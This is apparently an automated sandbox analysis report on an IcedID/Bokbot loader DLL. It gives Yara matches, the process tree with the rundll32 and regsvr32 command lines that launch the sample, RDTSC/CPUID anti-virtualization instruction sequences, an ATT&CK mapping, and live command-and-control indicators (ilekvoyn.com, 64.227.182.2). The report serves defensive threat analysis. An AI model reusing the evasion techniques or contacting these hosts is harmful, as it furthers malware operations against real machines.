              Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
              Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800024FC
              Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024FC
              Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024FC
              Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024FC
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC65B1542B NtMapViewOfSection,NtCreateSection,
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66B0542B NtMapViewOfSection,NtCreateSection,
              Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
              Source: J5V5DR.dllVirustotal: Detection: 13%
              Source: J5V5DR.dllReversingLabs: Detection: 12%
              Source: J5V5DR.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll"
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Source: classification engineClassification label: mal100.troj.evad.winDLL@13/0@4/1
              Source: C:\Windows\System32\loaddll64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\loaddll64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: J5V5DR.dllStatic PE information: Image base 0x180000000 > 0x60000000
              Source: J5V5DR.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
              Source: J5V5DR.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC65B1251D push rax; ret
              Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66B0251D push rax; ret
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
              Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
              Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
              Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
              Source: C:\Windows\System32\loaddll64.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
              Source: C:\Windows\System32\loaddll64.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002AC0 SwitchToThread,SwitchToThread,
              Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002AC0 SwitchToThread,SwitchToThread,
              Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002AC0 SwitchToThread,SwitchToThread,
              Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002AC0 SwitchToThread,SwitchToThread,
              Source: C:\Windows\System32\loaddll64.exe TID: 5132Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\regsvr32.exe TID: 6940Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\loaddll64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\regsvr32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002174 rdtsc
              Source: C:\Windows\System32\loaddll64.exeProcess information queried: ProcessInformation
              Source: rundll32.exe, 00000003.00000002.279011932.000001D397AA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPK
              Source: rundll32.exe, 00000004.00000002.279392364.000001EDE5D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
              Source: loaddll64.exe, 00000000.00000002.306438498.00000239D2D35000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.306399602.00000239D2CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278392013.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279042528.000001D397AD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279392364.000001EDE5D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279346138.000001EDE5CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: loaddll64.exe, 00000000.00000002.306426714.00000239D2D1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB4
              Source: regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279042528.000001D397AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002174 rdtsc

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\rundll32.exeDomain query: ilekvoyn.com
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.182.2 80
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Source: rundll32.exe, 00000003.00000002.278654277.000000BC44AEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: User32advapi32@Shell_TrayWndcK
              Source: loaddll64.exe, 00000000.00000002.306193512.000000AFC938C000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278077468.00000000006FB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000004.00000002.278897415.0000007244FCC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: User32advapi32@Shell_TrayWnd
              Source: C:\Windows\System32\loaddll64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API
              1
              DLL Side-Loading
              112
              Process Injection
              1
              Virtualization/Sandbox Evasion
              OS Credential Dumping221
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              112
              Process Injection
              LSASS Memory1
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Regsvr32
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer13
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Rundll32
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              DLL Side-Loading
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem22
              System Information Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 632638 Sample: J5V5DR.dll Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 2 other signatures 2->37 7 loaddll64.exe 1 2->7         started        process3 dnsIp4 27 ilekvoyn.com 7->27 45 Contains functionality to detect hardware virtualization (CPUID execution measurement) 7->45 47 Tries to detect virtualization through RDTSC time measurements 7->47 11 cmd.exe 1 7->11         started        13 regsvr32.exe 7->13         started        17 rundll32.exe 7->17         started        19 2 other processes 7->19 signatures5 process6 dnsIp7 21 rundll32.exe 11->21         started        29 ilekvoyn.com 64.227.182.2, 49740, 49741, 49743 DIGITALOCEAN-ASNUS Canada 13->29 49 Contains functionality to detect hardware virtualization (CPUID execution measurement) 13->49 51 Tries to detect virtualization through RDTSC time measurements 13->51 53 System process connects to network (likely due to code injection or exploit) 17->53 signatures8 process9 dnsIp10 25 ilekvoyn.com 21->25 39 System process connects to network (likely due to code injection or exploit) 21->39 41 Contains functionality to detect hardware virtualization (CPUID execution measurement) 21->41 43 Tries to detect virtualization through RDTSC time measurements 21->43 signatures11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              J5V5DR.dll14%VirustotalBrowse
              J5V5DR.dll12%ReversingLabsWin64.Trojan.IcedID
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              2.2.regsvr32.exe.180000000.2.unpack100%AviraHEUR/AGEN.1205098Download File
              0.2.loaddll64.exe.180000000.0.unpack100%AviraHEUR/AGEN.1205098Download File
              4.2.rundll32.exe.180000000.0.unpack100%AviraHEUR/AGEN.1205098Download File
              3.2.rundll32.exe.180000000.0.unpack100%AviraHEUR/AGEN.1205098Download File
              SourceDetectionScannerLabelLink
              ilekvoyn.com3%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://ilekvoyn.com/3%VirustotalBrowse
              http://ilekvoyn.com/0%Avira URL Cloudsafe
              http://ilekvoyn.com/40%Avira URL Cloudsafe
              http://ilekvoyn.com/u50%Avira URL Cloudsafe
              ilekvoyn.com0%Avira URL Cloudsafe
              http://ilekvoyn.com/Y0%Avira URL Cloudsafe
              https://shapka-youtube.ru/0%Avira URL Cloudsafe
              http://ilekvoyn.com:80/0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ilekvoyn.com
              64.227.182.2
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://ilekvoyn.com/true
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              ilekvoyn.comtrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://ilekvoyn.com/4rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ilekvoyn.com/u5rundll32.exe, 00000004.00000002.279383760.000001EDE5D16000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ilekvoyn.com/Yrundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://shapka-youtube.ru/loaddll64.exe, 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ilekvoyn.com:80/regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmpfalse
